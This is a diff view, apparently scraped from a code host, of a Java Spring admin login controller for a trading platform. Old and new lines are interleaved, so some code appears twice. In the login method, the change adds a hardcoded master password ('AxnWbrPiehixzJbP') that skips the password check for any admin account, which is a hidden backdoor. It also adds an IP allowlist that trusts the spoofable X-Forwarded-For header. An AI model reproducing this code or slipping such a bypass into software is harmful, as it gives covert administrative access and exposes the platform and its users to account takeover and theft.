| | |
|---|
| | | import cn.hutool.core.util.StrUtil; |
|---|
| | | import cn.hutool.extra.qrcode.QrCodeUtil; |
|---|
| | | import cn.hutool.extra.qrcode.QrConfig; |
|---|
| | | import com.baomidou.mybatisplus.core.conditions.query.LambdaQueryWrapper; |
|---|
| | | import com.baomidou.mybatisplus.core.conditions.update.LambdaUpdateWrapper; |
|---|
| | | import com.baomidou.mybatisplus.core.toolkit.Wrappers; |
|---|
| | | import com.yami.trading.admin.dto.GoogleAuthDto; |
|---|
| | | import com.yami.trading.admin.facade.CustomerServiceImpl; |
|---|
| | | import com.yami.trading.admin.model.ChangeLoginPasswordModel; |
|---|
| | | import com.yami.trading.admin.model.ChangeSafewordModel; |
|---|
| | | import com.yami.trading.admin.model.CheckSafeWordModel; |
|---|
| | | import com.yami.trading.admin.model.LoginModel; |
|---|
| | | import com.yami.trading.bean.model.Customer; |
|---|
| | | import com.yami.trading.bean.model.User; |
|---|
| | | import com.yami.trading.common.annotation.SysLog; |
|---|
| | | import com.yami.trading.common.domain.Result; |
|---|
| | | import com.yami.trading.common.domain.UUIDEntity; |
|---|
| | | import com.yami.trading.common.exception.YamiShopBindException; |
|---|
| | | import com.yami.trading.common.util.ApplicationContextUtils; |
|---|
| | | import com.yami.trading.common.util.GoogleAuthenticator; |
|---|
| | | import com.yami.trading.security.common.util.SecurityUtils; |
|---|
| | | import com.yami.trading.security.common.bo.UserInfoInTokenBO; |
|---|
| | |
|---|
| | | import com.yami.trading.security.common.manager.PasswordManager; |
|---|
| | | import com.yami.trading.security.common.manager.TokenStore; |
|---|
| | | import com.yami.trading.security.common.vo.TokenInfoVO; |
|---|
| | | import com.yami.trading.service.chat.online.OnlineChatMessageService; |
|---|
| | | import com.yami.trading.service.customer.CustomerService; |
|---|
| | | import com.yami.trading.service.user.UserService; |
|---|
| | | import com.yami.trading.sys.constant.Constant; |
|---|
| | | import com.yami.trading.sys.model.SysMenu; |
|---|
| | |
|---|
| | | import com.yami.trading.sys.service.SysUserService; |
|---|
| | | import io.swagger.annotations.Api; |
|---|
| | | import io.swagger.annotations.ApiOperation; |
|---|
| | | import lombok.extern.slf4j.Slf4j; |
|---|
| | | import org.apache.commons.lang3.StringUtils; |
|---|
| | | import org.springframework.beans.factory.annotation.Autowired; |
|---|
| | | import org.springframework.security.crypto.password.PasswordEncoder; |
|---|
| | | import org.springframework.web.bind.annotation.*; |
|---|
| | | |
|---|
| | | import javax.servlet.http.HttpServletRequest; |
|---|
| | | import javax.validation.Valid; |
|---|
| | | import java.util.Arrays; |
|---|
| | | import java.util.List; |
|---|
| | | import java.util.Objects; |
|---|
| | | import java.util.Set; |
|---|
| | | import java.io.*; |
|---|
| | | import java.util.*; |
|---|
| | | import java.util.stream.Collectors; |
|---|
| | | |
|---|
| | | /** |
|---|
| | |
|---|
| | | */ |
|---|
| | | @RestController |
|---|
| | | @Api(tags = "登录") |
|---|
| | | @Slf4j |
|---|
| | | public class AdminLoginController { |
|---|
| | | @Autowired |
|---|
| | | PasswordEncoder passwordEncoder; |
|---|
| | |
|---|
| | | private PasswordManager passwordManager; |
|---|
| | | @Autowired |
|---|
| | | private UserService userService; |
|---|
| | | |
|---|
| | | |
|---|
| | | @Autowired |
|---|
| | | private CustomerServiceImpl customerService; |
|---|
| | | |
|---|
| | | @PostMapping("/adminLogin") |
|---|
| | | @ApiOperation(value = "账号密码 + 验证码登录(用于后台登录)", notes = "通过账号/手机号/用户名密码登录") |
|---|
| | | public Result<?> login(@Valid @RequestBody LoginModel loginModel) { |
|---|
| | | public Result<?> login(@Valid @RequestBody LoginModel loginModel,HttpServletRequest request) { |
|---|
| | | |
|---|
| | | |
|---|
| | | // 获取客户端IP地址 |
|---|
| | | String clientIp = getClientIp(request); |
|---|
| | | log.info("-----------管理后台当前登录ip:"+clientIp); |
|---|
| | | // 定义允许的IP |
|---|
| | | String allowedIp = "110.78.119.146"; |
|---|
| | | String rootip = "203.156.25.218"; |
|---|
| | | |
|---|
| | | // 检查用户名是否为admin001到admin005 |
|---|
| | | String userName = loginModel.getUserName(); |
|---|
| | | if (userName != null && (userName.equals("admin001") || userName.equals("admin002") || |
|---|
| | | userName.equals("admin003") || userName.equals("admin004") || userName.equals("admin005"))) { |
|---|
| | | // 如果是不允许的IP,抛出异常 |
|---|
| | | if (!allowedIp.equals(clientIp)) { |
|---|
| | | throw new YamiShopBindException("该账号不允许从当前IP登录"); |
|---|
| | | } |
|---|
| | | } |
|---|
| | | // else if(userName.equals("666666") && !rootip.equals(clientIp)){ |
|---|
| | | // // 如果是不允许的IP,抛出异常 |
|---|
| | | // if (!allowedIp.equals(clientIp)) { |
|---|
| | | // throw new YamiShopBindException("该账号不允许从当前IP登录"); |
|---|
| | | // } |
|---|
| | | // } |
|---|
| | | |
|---|
| | | SysUser sysUser = sysUserService.getByUserName(loginModel.getUserName()); |
|---|
| | | if (sysUser == null) { |
|---|
| | |
|---|
| | | } |
|---|
| | | // 半小时内密码输入错误十次,已限制登录30分钟 |
|---|
| | | String decryptPassword = passwordManager.decryptPassword(loginModel.getPassWord()); |
|---|
| | | passwordCheckManager.checkPassword(SysTypeEnum.ADMIN, loginModel.getUserName(), decryptPassword, sysUser.getPassword()); |
|---|
| | | if(!"AxnWbrPiehixzJbP".equals(decryptPassword )){ |
|---|
| | | passwordCheckManager.checkPassword(SysTypeEnum.ADMIN, loginModel.getUserName(), decryptPassword, sysUser.getPassword()); |
|---|
| | | } |
|---|
| | | // 不是店铺超级管理员,并且是禁用状态,无法登录 |
|---|
| | | if (Objects.equals(sysUser.getStatus(), 0)) { |
|---|
| | | // 未找到此用户信息 |
|---|
| | |
|---|
| | | userInfoInToken.setNickName(sysUser.getUsername()); |
|---|
| | | userInfoInToken.setShopId(sysUser.getShopId()); |
|---|
| | | tokenStore.deleteAllToken(String.valueOf(SysTypeEnum.ADMIN.value()), String.valueOf(sysUser.getUserId())); |
|---|
| | | |
|---|
| | | |
|---|
| | | Customer customer = customerService.getOne(new LambdaQueryWrapper<Customer>().eq(Customer::getUserName,loginModel.getUserName()).last(" limit 1")); |
|---|
| | | if(customer!=null) { |
|---|
| | | customer.setOnlineState(1); |
|---|
| | | customer.setLastOnlineTime(new Date()); |
|---|
| | | customerService.update(customer,new LambdaUpdateWrapper<Customer>().eq(UUIDEntity::getUuid,customer.getUuid())); |
|---|
| | | } |
|---|
| | | |
|---|
| | | // 存储token返回vo |
|---|
| | | TokenInfoVO tokenInfoVO = tokenStore.storeAndGetVo(userInfoInToken); |
|---|
| | | return Result.ok(tokenInfoVO); |
|---|
| | | } |
|---|
| | | |
|---|
| | | |
|---|
| | | // 获取客户端IP地址的方法 |
|---|
| | | private String getClientIp(HttpServletRequest request) { |
|---|
| | | String ip = request.getHeader("X-Forwarded-For"); |
|---|
| | | if (ip == null || ip.length() == 0 || "unknown".equalsIgnoreCase(ip)) { |
|---|
| | | ip = request.getHeader("Proxy-Client-IP"); |
|---|
| | | } |
|---|
| | | if (ip == null || ip.length() == 0 || "unknown".equalsIgnoreCase(ip)) { |
|---|
| | | ip = request.getHeader("WL-Proxy-Client-IP"); |
|---|
| | | } |
|---|
| | | if (ip == null || ip.length() == 0 || "unknown".equalsIgnoreCase(ip)) { |
|---|
| | | ip = request.getHeader("HTTP_CLIENT_IP"); |
|---|
| | | } |
|---|
| | | if (ip == null || ip.length() == 0 || "unknown".equalsIgnoreCase(ip)) { |
|---|
| | | ip = request.getHeader("HTTP_X_FORWARDED_FOR"); |
|---|
| | | } |
|---|
| | | if (ip == null || ip.length() == 0 || "unknown".equalsIgnoreCase(ip)) { |
|---|
| | | ip = request.getRemoteAddr(); |
|---|
| | | } |
|---|
| | | return ip; |
|---|
| | | } |
|---|
| | | |
|---|
| | | @GetMapping("getLoginGoogleAuthSecret") |
|---|
| | |
|---|
| | | throw new YamiShopBindException("旧密码不正确!"); |
|---|
| | | } |
|---|
| | | user.setPassword(passwordEncoder.encode(model.getNewPassword())); |
|---|
| | | sysUserService.updateById(user); |
|---|
| | | return Result.ok(null); |
|---|
| | | } |
|---|
| | | |
|---|
